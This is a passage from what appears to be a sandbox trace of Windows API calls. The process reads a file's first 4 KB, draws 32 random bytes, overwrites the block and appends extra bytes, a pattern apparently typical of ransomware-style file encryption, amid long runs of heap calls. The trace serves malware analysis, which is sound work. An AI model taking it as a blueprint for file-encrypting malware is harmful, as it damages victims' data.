lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.821] GetProcessHeap () returned 0x280000 [0076.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0076.821] GetProcessHeap () returned 0x280000 [0076.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.821] GetProcessHeap () returned 0x280000 [0076.821] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0076.821] GetProcessHeap () returned 0x280000 [0076.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.821] GetProcessHeap () returned 0x280000 [0076.821] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0076.821] GetProcessHeap () returned 0x280000 [0076.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.821] GetProcessHeap () returned 0x280000 [0076.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.821] GetProcessHeap () returned 0x280000 [0076.821] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.821] GetProcessHeap () returned 0x280000 [0076.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.821] GetProcessHeap () returned 0x280000 [0076.821] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.821] GetProcessHeap () returned 0x280000 [0076.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.822] GetProcessHeap () returned 0x280000 [0076.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0076.823] GetProcessHeap () returned 0x280000 [0076.823] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0076.823] GetProcessHeap () returned 0x280000 [0076.824] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.824] GetProcessHeap () returned 0x280000 [0076.824] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0076.824] GetProcessHeap () returned 0x280000 [0076.824] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.824] GetProcessHeap () returned 0x280000 [0076.824] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.824] GetProcessHeap () returned 0x280000 [0076.824] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.824] GetProcessHeap () returned 0x280000 [0076.824] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.824] GetProcessHeap () returned 0x280000 [0076.824] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.824] GetProcessHeap () returned 0x280000 [0076.824] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.824] GetProcessHeap () returned 0x280000 [0076.824] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.824] GetProcessHeap () returned 0x280000 [0076.824] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.824] GetProcessHeap () returned 0x280000 [0076.824] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.824] GetProcessHeap () returned 0x280000 [0076.824] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.824] GetProcessHeap () returned 0x280000 [0076.824] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.824] GetProcessHeap () returned 0x280000 [0076.825] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.825] GetProcessHeap () returned 0x280000 [0076.825] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0076.825] GetProcessHeap () returned 0x280000 [0076.826] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.826] GetProcessHeap () returned 0x280000 [0076.826] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0076.826] GetProcessHeap () returned 0x280000 [0076.826] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0076.826] GetProcessHeap () returned 0x280000 [0076.826] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0076.826] GetProcessHeap () returned 0x280000 [0076.826] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0076.826] SetFilePointerEx (in: hFile=0x7fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.826] WriteFile (in: hFile=0x7fc, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.826] WriteFile (in: hFile=0x7fc, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.826] GetProcessHeap () returned 0x280000 [0076.826] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0076.826] GetProcessHeap () returned 0x280000 [0076.826] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0076.826] GetProcessHeap () returned 0x280000 [0076.826] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0076.826] CloseHandle (hObject=0x7fc) returned 1 [0076.827] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 31 [0076.828] SetFilePointerEx (in: hFile=0x804, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.828] ReadFile (in: hFile=0x804, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.828] SetFilePointerEx (in: hFile=0x804, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.828] GetProcessHeap () returned 0x280000 [0076.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0076.828] GetProcessHeap () returned 0x280000 [0076.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0076.828] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0076.828] GetProcessHeap () returned 0x280000 [0076.828] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0076.828] ReadFile (in: hFile=0x804, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.902] SetFilePointerEx (in: hFile=0x804, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.902] WriteFile (in: hFile=0x804, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.902] GetProcessHeap () returned 0x280000 [0076.902] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0076.902] GetProcessHeap () returned 0x280000 [0076.902] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.902] GetProcessHeap () returned 0x280000 [0076.902] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0076.902] GetProcessHeap () returned 0x280000 [0076.902] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.902] GetProcessHeap () returned 0x280000 [0076.902] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.903] GetProcessHeap () returned 0x280000 [0076.903] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0076.904] GetProcessHeap () returned 0x280000 [0076.904] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.904] GetProcessHeap () returned 0x280000 [0076.905] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.905] GetProcessHeap () returned 0x280000 [0076.905] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.906] GetProcessHeap () returned 0x280000 [0076.906] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.906] GetProcessHeap () returned 0x280000 [0076.907] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.907] GetProcessHeap () returned 0x280000 [0076.907] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.907] GetProcessHeap () returned 0x280000 [0076.907] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.907] GetProcessHeap () returned 0x280000 [0076.907] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0076.907] GetProcessHeap () returned 0x280000 [0076.907] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.907] GetProcessHeap () returned 0x280000 [0076.907] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0076.907] GetProcessHeap () returned 0x280000 [0076.907] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0076.907] GetProcessHeap () returned 0x280000 [0076.907] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0076.907] GetProcessHeap () returned 0x280000 [0076.907] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) 